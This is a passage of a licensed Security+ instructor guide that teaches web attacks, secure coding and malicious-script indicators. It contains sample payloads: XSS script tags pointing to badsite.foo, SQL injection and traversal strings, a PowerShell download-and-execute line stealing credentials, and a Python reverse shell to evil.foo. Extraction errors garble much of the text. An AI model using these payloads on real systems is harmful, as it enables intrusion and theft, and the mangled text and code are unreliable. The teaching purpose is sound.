of session tokens that will enable an attacker to predict future valid session values. If the browser runs the
an attacker can predict the session token, then the attacker can take over a session malicious code. This
that has yet to be established. A session token must be generated using a non- might trigger some
predictable algorithm, and it must not reveal any information about the session client. action on the server,
In addition, proper session management dictates that apps limit the lifespan of a but it is client-side
because the browser
session and require reauthentication after a certain period.
is coding the request.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
376 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Clickjacking
Clickjacking is an attack where what the user sees and trusts as a web application
with some sort of login page or form contains a malicious layer or invisible iFrame
that allows an attacker to intercept or redirect user input. Click acking can be launched
using any type of compromise that allows the adversary to run arbitrary code as a
script. Click acking can be mitigated by using TT response headers that instruct the
browser not to open frames from di erent origins domains and by ensuring that any
buttons or input boxes on a page are positioned on the top-most layer.
SSL Strip
Show Slide(s)
A Secure Sockets Layer (SSL) strip attack is launched against clients on a local network
as they try to make connections to websites. The threat actor must first perform a
Cross ite cripting Man-in-the-Middle attack via ARP poisoning to masquerade as the default gateway.
When a client requests an HTTP site that redirects to an HTTPS site in an unsafe way,
Teaching
the sslstrip utility (tools.kali.org/information-gathering/sslstrip) proxies the request and
Tip
response, serving the client the HTTP site, hopefully with an unencrypted login form. If
Make sure students
the user enters credentials, they will be captured by the threat actor. Sites can use the
can identify code that
performs XSS. HTTP Strict Transport Security (HSTS) lists maintained by browsers to prevent clients
Also check that
re uesting TT in the first place.
students understand
the di erence
between XSRF and
Cross ite criptin
XSS. XSRF spoofs
Web applications depend on scripting, and most websites these days are web
a specific re uest
against the web applications rather than static web pages. If the user attempts to disable scripting,
application; XSS is a very few sites will be left available. A cross-site scripting (XSS) attack exploits the fact
means of running any that the browser is likely to trust scripts that appear to come from a site the user has
arbitrary code. An XSS chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site.
attack could be used A nonpersistent type of XSS attack would proceed as follows:
to perform XSRF, for
instance. 1. The attacker identifies an input validation vulnerability in the trusted site.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 377
2. The attacker crafts a L to perform a code in ection against the trusted site. This
could be coded in a link from the attacker's site to the trusted site or a link in an
email message.
3. When the user clicks the link, the trusted site returns a page containing the
malicious code in ected by the attacker. As the browser is likely to be configured
to allow the site to run scripts, the malicious code will execute.
The malicious code could be used to deface the trusted site (by adding any sort of
arbitrary HTML code), steal data from the user's cookies, try to intercept information
entered into a form, perform a request forgery attack, or try to install malware. The
crucial point is that the malicious code runs in the client's browser with the same
permission level as the trusted site.
An attack where the malicious input comes from a crafted link is a re ected or
nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a
back-end database or content management system used by the trusted site. For
example, the attacker may submit a post to a bulletin board with a malicious script
embedded in the message. When other users view the message, the malicious script
is executed. For example, with no input sanitization, a threat actor could type the
following into a new post te t field
Check out this amazing <a href="https://trusted.
foo">website</a><script src="https://badsite.foo/
hook.js"></script>.
sers viewing the post will have the malicious script hook. s e ecute in their browser.
A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts often
use the Document Object Model (DOM) to modify the content and layout of a web
page. For example, the "document.write" method enables a page to take some user
input and modify the page accordingly. An exploit against a client-side script could
work as follows:
1. The attacker identifies an input validation vulnerability in the trusted site. or
example, a message board might take the user's name from an input text box
and show it in a header.
https://trusted.foo/messages?user=james
2. The attacker crafts a URL to modify the parameters of a script that the server will
return, such as:
https://trusted.foo/messages#user=James%3Cscript%20
src%3D%22https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fbadsite.foo%2Fhook.
js%22%3E%3C%2Fscript%3E
3. The server returns a page with the legitimate DOM script embedded, but
containing the parameter:
Teaching
Structured Query Language Injection Attacks Tip
Make sure students
Attacks such as session replay, CSRF, and DOM-based XSS are client-side attacks. can identify SQL code
This means that they execute arbitrary code on the browser. A server-side attack and suspicious query
causes the server to do some processing or run a script or query in a way that is not strings.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
378 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
authorized by the application design. Most server-side attacks depend on some kind of
in ection attack.
here an over ow attack works against the way a process performs memory
management, an in ection attack e ploits some unsecure way in which the application
processes requests and queries. For example, an application might allow a user to view
his or her profile with a database uery that should return the single record for that
one user's profile. An application vulnerable to an in ection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they are
only supposed to be able to read them.
A web application is likely to use Structured Query Language (SQL) to read and write
information from a database. The main database operations are performed by SQL
statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE),
and updating data (UPDATE). In a SQL injection attack, the threat actor modifies
one or more of these four basic functions by adding code to some input accepted by
the app, causing it to execute the attacker's own set of SQL queries or parameters.
If successful, this could allow the attacker to extract or insert information into the
database or execute arbitrary code on the remote system using the same privileges as
the database application (owasp.org www community attacks L In ection).
For example, consider a web form that is supposed to take a name as input. If the user
enters "Bob", the application runs the following query:
SELECT * FROM tbl_user WHERE username = 'Bob'
If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the following
malicious query will be executed:
SELECT * FROM tbl_user WHERE username = '' or 1=1--#
The logical statement 1=1 is always true, and the --# string turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 379
Directory traversal is another type of in ection attack performed against a web server. Directory Traversal
The threat actor submits a re uest for a file outside the web server's root directory by and Command
submitting a path to navigate to the parent directory (../). This attack can succeed if the In ection Attacks
input is not filtered properly and access permissions on the file are the same as those
on the web server directory.
The threat actor might use a canonicalization attack to disguise the nature of the
malicious input. Canonicalization refers to the way the server converts between the
di erent methods by which a resource such as a file path or L may be represented
and submitted to the simplest (or canonical) method used by the server to process the
input. Examples of encoding schemes include HTML entities and character set percent
encoding (ASCII and Unicode). An attacker might be able to exploit vulnerabilities in
the canonicali ation process to perform code in ection or facilitate directory traversal.
For example, to perform a directory traversal attack, the attacker might submit a URL
such as
http //victim. oo/ show ../../../../etc/config
A limited input validation routine would prevent the use of the string ../ and refuse the
request. If the attacker submitted the URL using the encoded version of the characters,
he or she might be able to circumvent the validation routine:
http://victim.foo/?
show %2e%2e%2 %2e%2e%2 %2e%2e%2 %2e%2e%2 etc/config
A command injection attack attempts to cause the server to run OS shell commands
and return the output to the browser. As with directory traversal, the web server
should normally be able to prevent commands from operating outside of the server's
directory root and to prevent commands from running with any other privilege level
than the web "guest" user (who is normally granted only very restricted privileges).
A successful command in ection attack would find some way of circumventing this
security or find a web server that is not properly configured .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
380 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 381
SSRF encompasses a very wide range of potential exploits and targets, some of
which include
• Reconnaissance—a response may contain metadata describing the type and
configuration of internal servers. can also be used to port scan within the
internal network.
• Credential stealing—a response may contain an API key that the internal servers use
between themselves.
• Protocol smuggling—despite initially being carried over HTTP, the SSRF might target
an internal MT or T server. That server may be configured in a best e ort
way, strip the HTTP header, and do its best to return the response to the SMTP or
FTP request.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
382 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Indicators o e Application Attacks
Answer the following questions:
1. You are reviewing access logs on a web server and notice repeated requests
for URLs containing the strings %3C and %3E. Is this an event that should be
investigated further, and why?
Those strings represent percent encoding for HTML tag delimiters (< and >). This could
be an attempt to in ect a script so should be investigated.
2. You have been asked to monitor baseline API usage so that a rate limiter
value can be set. What is the purpose of this?
A rate limiter will mitigate denial of service (DoS) attacks on the API, where a malicious
entity generates millions of spurious requests to block legitimate ones. You need to
establish a baseline to ensure continued availability for legitimate users by setting the
rate limit at an appropriate level.
The attacker captures some data, such as a cookie, used to log on or start a session
legitimately. The attacker then resends the captured data to re-enable the connection.
The attacker inserts an invisible layer into a trusted web page that can intercept or
redirect input without the user realizing.
Where the attacker inserts malicious code into the back-end database used to serve
content to the trusted site.
The attacker needs to find a vulnerable input method, such as a form control or L or
script parser, that will allow the execution of OS shell commands.
Server-side request forgery (SSRF) causes a public server to make an arbitrary request
to a back-end server. This is made much harder if the threat actor has to defeat
an authentication or authorization mechanism between the web server and the
database server.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 383
Topic
Summari e Secure oding ractices
The security considerations for new programming technologies should be well Secure Coding
understood and tested before deployment. One of the challenges of application Techniques
development is that the pressure to release a solution often trumps any requirement
to ensure that the application is secure. A legacy software design process might be Teaching
heavily focused on highly visible elements, such as functionality, performance, and Tip
cost. Modern development practices use a security development life cycle running in Check that students
parallel or integrated with the focus on software functionality and usability. Examples understand the
include Microsoft's SDL (microsoft.com/en-us/securityengineering/sdl) and the OWASP di erence between
Software Assurance Maturity Model (owasp.org www pro ect samm) and Security input validation and
output encoding.
Knowledge Framework (owasp.org www pro ect security knowledge framework).
Input validation occurs
A also collates descriptions of specific vulnerabilities, e ploits, and mitigation
when a script takes
techniques, such as the OWASP Top 10 (owasp.org www pro ect top ten). data passed to it by
Some of the most important coding practices are input validation, output encoding, some other process.
This could be an API
and error handling. request, user form
data, and so on. Input
Input Validation validation can be
performed by client-
A primary vector for attacking applications is to exploit faulty input validation. Input side code, server-side
could include user data entered into a form or URL passed by another application as code, or both.
a L or TT header. Malicious input could be crafted to perform an over ow attack Output encoding
or some type of script or L in ection attack. To mitigate this risk, all input methods occurs when a script
should be documented with a view to reducing the potential attack surface exposed by passes data to another
the application. There must be routines to check user input, and anything that does not script. For example,
when a server passes
conform to what is re uired must be re ected. parameters to a DOM
script running in
Normalization and Output Encoding the browser, output
encoding ensures
here an application accepts string input, the input should be sub ected to it isn't passing any
normalization procedures before being accepted. Normalization means that a string malicious "<script>"
is stripped of illegal characters or substrings and converted to the accepted character contents. Output
set. This ensures that the string is in a format that can be processed correctly by the encoding avoids the
assumption that
input validation routines. input will have been
hen user generated strings are passed through di erent conte ts in a web sanitized already.
application between TT , Java cript, , and L for instance each with
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
384 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• et the ttp nly attribute to make the cookie inaccessible to document ob ect
model/client-side scripting.
• Use the SameSite attribute to control from where a cookie may be sent, mitigating
request forgery attacks.
esponse eaders
A number of security options can be set in the response header returned by the
server to the client (owasp.org www pro ect secure headers). While it should seem
like a straightforward case of enabling all these, developers are often constrained by
compatibility and implementation considerations between di erent client browser
and server software types and versions. Some of the most important security-relevant
header options are:
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 385
• HTTP Strict Transport Security (HSTS)—forces browser to connect using HTTPS only,
mitigating downgrade attacks, such as SSL stripping.
• Content ecurity olicy C mitigates click acking, script in ection, and other
client-side attacks. Note that X-Frame-Options and X-XSS-Protection provide
mitigation for older browser versions, but are now deprecated in favor of CSP.
Data exposure is a fault that allows privileged information (such as a token, password, Data Exposure and
or personal data to be read without being sub ect to the appropriate access controls. Memory Management
Applications must only transmit such data between authenticated hosts, using
cryptography to protect the session. When incorporating encryption in your code, it's
important to use encryption algorithms and techniques that are known to be strong,
rather than creating your own.
Error Handling
A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input, a
loss of network connectivity, another server or process failing, and so on. Ideally, the
programmer will have written a structured exception handler (SEH) to dictate what
the application should then do. Each procedure can have multiple exception handlers.
Some handlers will deal with anticipated errors and exceptions; there should also be
a catchall handler that will deal with the unexpected. The main goal must be for the
application not to fail in a way that allows the attacker to execute code or perform
some sort of in ection attack. ne infamous e ample of a poorly written e ception
handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-
goto fail apples ssl bug e plained plus an unofficial patch).
Another issue is that an application's interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for an
application to use custom error handlers so that the developer can choose the amount
of information shown when an error is caused.
Technically, an error is a condition that the process cannot recover from, such as the system
running out of memory. An exception is a type of error that can be handled by a block of
code without the process crashing. ote that exceptions are still described as generating
error codes/messages, however.
Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute his or her own code in
the space marked out by the target application. There are known unsecure practices
for memory management that should be avoided and checks for processing untrusted
input, such as strings, to ensure that it cannot overwrite areas of memory.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
386 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
uscation Camou a e
It is important that code be well documented, to assist the e orts of multiple
programmers working on the same pro ect. ell documented code is also easier to
analyze, however, which may assist the development of attacks. Code can be made
difficult to analy e by using an obfuscator, which is software that randomi es the
names of variables, constants, functions, and procedures, removes comments and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 387
white space, and performs other operations to make the compiled code physically
and mentally difficult to read and follow. This sort of techni ue might be used to
make reverse engineering an application more difficult and as a way of disguising
malware code.
Development is only one stage in the software life cycle. A new release of an tatic Code Analysis
application or automation script should be audited to ensure that it meets the goals of
confidentiality, integrity, and availability critical to any secure computer system.
Static code analysis (or source code analysis) is performed against the application
code before it is packaged as an executable process. The analysis software must
support the programming language used by the source code. The software will scan
the source code for signatures of known issues, such as OWASP Top 10 Most Critical
eb Application ecurity isks or in ection vulnerabilities generally. NI T maintains a
list of source code analyzers and their key features (samate.nist.gov/index.php/Source_
Code_Security_Analyzers.html).
Human analysis of software source code is described as a manual code review. It is
important that the code be reviewed by developers (peers) other than the original
coders to try to identify oversights, mistaken assumptions, or a lack of knowledge or
experience. It is important to establish a collaborative environment in which reviews
can take place e ectively.
Static code review techniques will not reveal vulnerabilities that might exist in the Dynamic Code
runtime environment, such as exposure to race conditions or unexpected user input. Analysis
Dynamic analysis means that the application is tested under "real world" conditions
using a staging environment.
Fuzzing is a means of testing that an application's input validation routines work
well. Fuzzing means that the test or vulnerability scanner generates large amounts
of deliberately invalid and/or random input and records the responses made by
the application. This is a form of "stress testing" that can reveal how robust the
application is. There are generally three types of fu ers, representing di erent ways of
in ecting manipulated input into the application
• Application UI—identify input streams accepted by the application, such as input
boxes, command line switches, or import/export functions.
• ile format attempt to open files whose format has been manipulated, perhaps
manipulating specific features of the file.
Fuzzers are also distinguished by the way in which they craft each input (or test
case . The fu er may use semi random input dumb fu er or might craft specific
input based around known exploit vectors, such as escaped command sequences or
character literals, or by mutating intercepted inputs.
Associated with fuzzing is the concept of stress testing an application to see how an
application performs under extreme performance or usage scenarios.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
388 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Finally, the fuzzer needs some means of detecting an application crash and recording
which input se uence generated the crash.
Loading a list of strings for the payload of a fuzzing test in Burp Suite.
(Screenshot Burp Suite portswigger.net/burp.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 389
Review Activity:
Secure oding ractices
Answer the following questions:
Input validation provides some mitigation against this type of input being passed to an
application via a user form. Output encoding could provide another layer of protection
by checking that the query that the script passes to the database is safe.
Output encoding ensures that strings are made safe for the context they are being
passed to, such as when a JavaScript variable provides output to render as HTML. Safe
means that the string does not contain unauthorized syntax elements, such as script
tags.
3. You are discussing execution and validation security for DOM scripting with
the web team. A junior team member wants to know if this relates to client-
side or server-side code. What is your response?
The document ob ect model D M is the means by which a script Java cript can
change the way a page is rendered. As this change is rendered by the browser, it is
client-side code.
A default error message might reveal platform information and the workings of the
code to an attacker.
A software development kit (SDK) contains tools and code examples released by a
vendor to make developing applications within a particular environment (framework,
programming language, OS, and so on) easier. Any element in the SDK could contain
vulnerabilities that could then be transferred to the developer's code or application.
7. What type of dynamic testing tool would you use to check input validation
on a web form?
A fuzzer can be used to submit known unsafe strings and randomized input to test
whether they are made safe by input validation or not.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
390 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14D
Implement Secure Script Environments
Show Slide(s) A scripting language like Python is a general purpose or procedural language. It can be
adapted to perform many tasks. A domain-specific language ( S ) performs a particular
ython cript task, such as regex string parsing. Orchestration manages multiple automation scripts and
Environment configuration data to provision a service.
Teaching
Tip All coding languages have a specific synta that constrains the way sections of code are
Given the time laid out in blocks and the standard statements that are available, such as branching
allowed, ust try to and looping constructions.
ensure that students
can identify Python
code and interpret thon cript n ironment
basic code structures,
such as function Python is a popular language for implementing all kinds of development pro ects,
definitions, function including automation tools and security tools, as well as malicious scripts (python.org).
calls, and logical tests. Where many languages use brackets to denote blocks of code, Python uses indentation
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 391
(4 spaces per level, by convention). Any statement that starts a block is delimited by
a colon. Python is case-sensitive; for example, the variable user cannot be referred
to by the label User or USER. Comment lines are marked by the # character. You can
view inline help on modules, functions, and keywords using the help statement. For
example, the following command shows help for the print function: help(print)
Variables
Python uses the = operator to assign a name to a variable. Names are not declared
with a data type, such as string or integer, but Python is strongly typed, meaning that
you cannot multiply an integer variable by a string variable, for instance. String literals
can be delimited using single or double quotes.
Functions
Functions are used to produce modular, reusable code. A function takes some
arguments as parameters, performs some processing, and typically returns some
output. When creating a script, you will use some functions from Python's modules and
define your own functions. A function is defined using the following indentation synta
def fullname(name,surname):
return name + " " + surname
his ends the unction definition
#The next line calls the function to set a variable
greeting = 'Hello ' + fullname('World', '')
print(greeting)
Operator Operation
== Is equal to
!= Is not equal to
< Is less than
> Is greater than
<= Is less than or equal to
>= Is greater than or equal to
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
392 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Modules
A Python module is a library of functions for accomplishing standard tasks, such
as opening a network socket or interacting with an operating system's API. One of
the perceived strengths of Python is the huge number of modules. For example,
the os module contains functions to interact with the operating system, while the
socket module handles network connections and the url module opens and parses
resource addresses. Various extension modules allow a Python script to interact with
indows A Is.
The presence of two malicious libraries within a Python repository illustrates the potential
risks of third-party code (https://www.zdnet.com/article/two-malicious-python-libraries-
removed-from-pypi/).
Execution
Python is an interpreted language, executed within the context of a binary Python
process. In Windows, a Python script (.py) can be called via python.exe (with a
command window) or pythonw.exe (with no command window). A Python script can
also be compiled to a standalone Windows executable using the py2exe extension. This
executable can be digitally signed.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 393
Modules
PowerShell can also be used with a large number of modules, which are added to a
script using the Import-Module cmdlet.
Execution control is the process of determining what additional software or scripts Execution Control
may be installed or run on a host beyond its baseline.
Teaching
Allow and Block Lists Tip
Execution control can be implemented as either an allow list or a block list. Terminology such as
black/whitelist is non-
• Allow list is a highly restrictive policy that means only running authorized processes inclusive and is being
and scripts. Allowing only specific applications that have been added to a list will replaced by neutral
terms (block/allow
inevitably hamper users at some point and increase support time and costs. For
lists).
example, a user might need to install a conferencing application at short notice.
• Block list is a permissive policy that only prevents execution of listed processes
and scripts. It is vulnerable to software that has not previously been identified as
malicious (or capable of or vulnerable to malicious use).
These concepts can also be referred to as whitelists and blacklists, but most sources now
deprecate this type of non-inclusive terminology.
Code Signing
Code signing is the principal means of proving the authenticity and integrity of code
an e ecutable or a script . The developer creates a cryptographic hash of the file then
signs the hash using his or her private key. The program is shipped with a copy of the
developer's code signing certificate, which contains a public key that the destination
computer uses to read and verify the signature. The OS then prompts the user to
choose whether to accept the signature and run the program.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
394 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In indows, execution of PowerShell scripts can be inhibited by the execution policy. ote
that the execution policy is not an access control mechanism. It can be bypassed in any
number of different ways. AC is a robust mechanism for restricting use of potentially
dangerous code, such as malicious PowerShell.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 395
There are numerous exploit frameworks to leverage PowerShell functionality, such as PowerShell Malicious
PowerShell Empire, PowerSploit, Metasploit, and Mimikatz. Some suspicious indicators Indicators
for PowerShell execution include the following:
Teaching
• Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-
Tip
ervice, Create Thread, tart rocess, and New b ect can indicate an attempt to
Aim to give students
run some type of binary shellcode. This is particularly suspicious if combined with
basic recognition
a DownloadString or DownloadFile argument. One complication is that cmdlets can of common attack
be shortened, assisting obfuscation. For example, Invoke-Expression can be run frameworks and
using IEX. potentially suspicious
cmdlets and usages.
powershell.exe "IEX (New-Object Net.WebClient).
DownloadString('https://badsite.foo/DoEvil.ps1');
Do-Evil -StealCreds"
• Bypassing execution policy can also act as an indicator. The PowerShell code may be
called as a Base64 encoded string (-enc argument) or may use the -noprofile
or -ExecutionPolicy bypass arguments.
• sing system calls to the indows A I might indicate an attempt to in ect a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process:
[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\
Temp\doevil.dll")
• Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.
The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
• Use group policy to restrict execution of PowerShell to trusted accounts and hosts.
• Use group policy execution control to run scripts only from trusted locations.
• Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass access controls.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
396 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A very common vector for attacking Linux hosts is to use an exploit to install a web
shell as a backdoor (acunetix.com/blog/articles/introduction-web-shells-part-1). Typical
code to implement a reverse shell (connecting out to the machine at evil.foo on port
4444) is as follows:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("evil.foo",4444))
os.dup2(s.fileno() 0)
os.dup2(s.fileno() 1)
os.dup2(s.fileno() 2)
pty.spawn("/bin/sh")'
The os.dup2 statements redirect the terminal's data streams stdin (0), stdout (1),
and stderr to the socket ob ect s). The pty module provides a library of functions
for managing a pseudo-terminal, in this case starting the shell process at /bin/sh.
The code to implement a shell can be obfuscated in numerous ways. One way to
identify malicious scripts trying to match code samples is to scan the file system against
a configuration baseline, either using file integrity monitoring or use of the Linu diff
command.
Show Slide(s)
A common exploit for a vulnerable web server is to upload a cryptominer, misusing
Macros and Visual the server's CPU resources to try to obtain new cryptocurrency. You can use Linux
Basic for Applications utilities such as top and free to diagnose excessive CPU and memory resource
(VBA) consumption by such malware.
Teaching This white paper describes the use of ash and Python attack tools (f .com labs articles
Tip threat-intelligence/attackers-use-new--sophisticated-ways-to-install-cryptominers).
Students need to
look out for macros
or document scripts
that download binary Macros and Visual Basic for Applications (VBA)
data or try to execute
scripts in other A document macro is a sequence of actions performed in the context of a word
languages. processor, spreadsheet, or presentation file. hile the user may be able to record
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 397
macro steps using the GUI, ultimately macros are coded in a scripting language.
Microsoft ffice uses the Visual Basic for Applications (VBA) language, while PDF
documents use Java cript. Microsoft ffice document macros can be inspected
using ALT+F11. Other vendors and open-source software also implement macro
functionality, using languages such as Basic or Python.
A malicious actor will try to use a macro-enabled document to execute arbitrary
code. For example, a Word document could be the vector for executing a malicious
ower hell script. Macros are disabled by default in ffice, but the attacker may be
able to use a social engineering attack to get the user to change the policy.
With PDF, the JavaScript might be embedded within the document and designed to
exploit a known vulnerability in the reader software to execute without authorization
(sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks).
A man-in-the-browser (MitB) attack is a specific type of on path attack where the web Man-in-the-Browser
browser is compromised. Depending on the level of privilege obtained, the attacker Attack
may be able to inspect session cookies, certificates, and data, change browser settings,
perform redirection, and in ect code.
A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs (attack.mitre.org/techniques/
T1185). The Browser Exploitation Framework (BeEF) (beefpro ect.com) is one well
known MitB tool. There are various vulnerability exploit kits that can be installed to a
website to actively try to exploit vulnerabilities in clients browsing the site (trendmicro.
com vinfo ie security definition e ploit kit). These kits may either be installed to a
legitimate site without the owner's knowledge (by compromising access control on
the web server) and load in an iFrame (invisible to the user), or the attacker may use
phishing/social engineering techniques to trick users into visiting the site.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
398 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Script Environments
Answer the following questions:
1. You have been asked to investigate a web server for possible intrusion. You
identify a script with the following code. What language is the code in and
does it seem likely to be malicious?
2. Which tools can you use to restrict the use of PowerShell on Windows
clients
There are various group policy-based mechanisms, but for Windows 10, the Windows
Defender Application Control (WDAC) framework provides the most powerful toolset
for execution control policies.
The Local Security Authority Subsystem Service (LSASS) enforces security policies,
including authentication and password changes. Consequently, it holds hashes of user
passwords in memory. Attacks on lsass.exe are typically credential dumping to steal
those hashes.
No. hile isual asic for Applications A can only be used with Microsoft ffice,
other types of document can contain embedded scripts, such as JavaScript in PDFs.
ther ffice suites, such as pen ffice and Libre ffice, use scripting languages for
macros too.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 399
Topic 14E
Summarize Deployment and
Automation oncepts
A Dev ec ps culture gives pro ect teams a broad base of development, security, Show Slide(s)
and operations expertise and experience. This promotes an environment in which
security tasks make increased use of automation. Automation is the completion of
Application
an administrative task without human intervention. Task automation steps may be Development,
configurable through a I control panel, via a command line, or via an A I called Deployment, and
by scripts. Tasks can be automated to provision resources, add accounts, assign Automation
permissions, perform incident detection and response, and any number of other
network security tasks.
Manual configuration introduces a lot of scope for making errors. A technician may be
unsure of best practice, or there may be a lack of documentation. Over time, this leads to
many small discrepancies in the way instances and services are configured. These small
discrepancies can become big problems when it comes to maintaining, updating, and
securing IT and cloud infrastructure. Automation provides better scalability and elasticity:
• Scalability means that the costs involved in supplying the service to more users are
linear. For example, if the number of users doubles in a scalable system, the costs to Show Slide(s)
maintain the same level of service would also double (or less than double). If costs
more than double, the system is less scalable. Secure Application
Development
• Elasticity refers to the system's ability to handle changes on demand in real time. Environments
A system with high elasticity will not experience loss of service or performance if
demand suddenly doubles (or triples, or quadruples). Conversely, it may be important Teaching
for the system to be able to reduce costs when demand is low. Elasticity is a common Tip
selling point for cloud services. Instead of running a cloud resource for 24 hours a day, This syllabus revision
7 days a week, that resource can diminish in power or shut down completely when has removed waterfall
demand for that resource is low. When demand picks up again, the resource will grow and Agile as explicit
in power to the level re uired. This results in cost e ective operations. content examples.
We need to mention
them to explain
Secure Application Development Environments "continuous," but
students should not
Security must be a key component of the application or automation design process. need to know the
development life cycle
Even a simple form and script combination can make a web server vulnerable if the phases in anything
script is not well written. A software development life cycle (SDLC) divides the other than very
creation and maintenance of software into discrete phases. There are two principal general terms.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
400 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
SDLCs: the waterfall model and Agile development. Both these models stress
the importance of requirements analysis and quality processes to the success of
development pro ects.
Development Environments
To meet the demands of the life cycle model and quality assurance, code is normally
passed through several di erent environments
• Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbo for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and sub ected to basic unit and functional tests either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions re uired by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 401
The use of development life cycle models and QA processes extends past development Provisioning,
and testing to the deployment and maintenance of an application or script-based Deprovisioning, and
automation task. Version Control
Provisioning
Provisioning is the process of deploying an application to the target environment,
such as enterprise desktops, mobile devices, or cloud infrastructure. An enterprise
provisioning manager might assemble multiple applications in a package. Alternatively,
the and applications might be defined as a single instance for deployment on a
virtualized platform. The provisioning process must account for changes to any of
these applications so that packages or instances are updated with the latest version.
Deprovisioning
Deprovisioning is the process of removing an application from packages or instances.
This might be necessary if software has to be completely rewritten or no longer
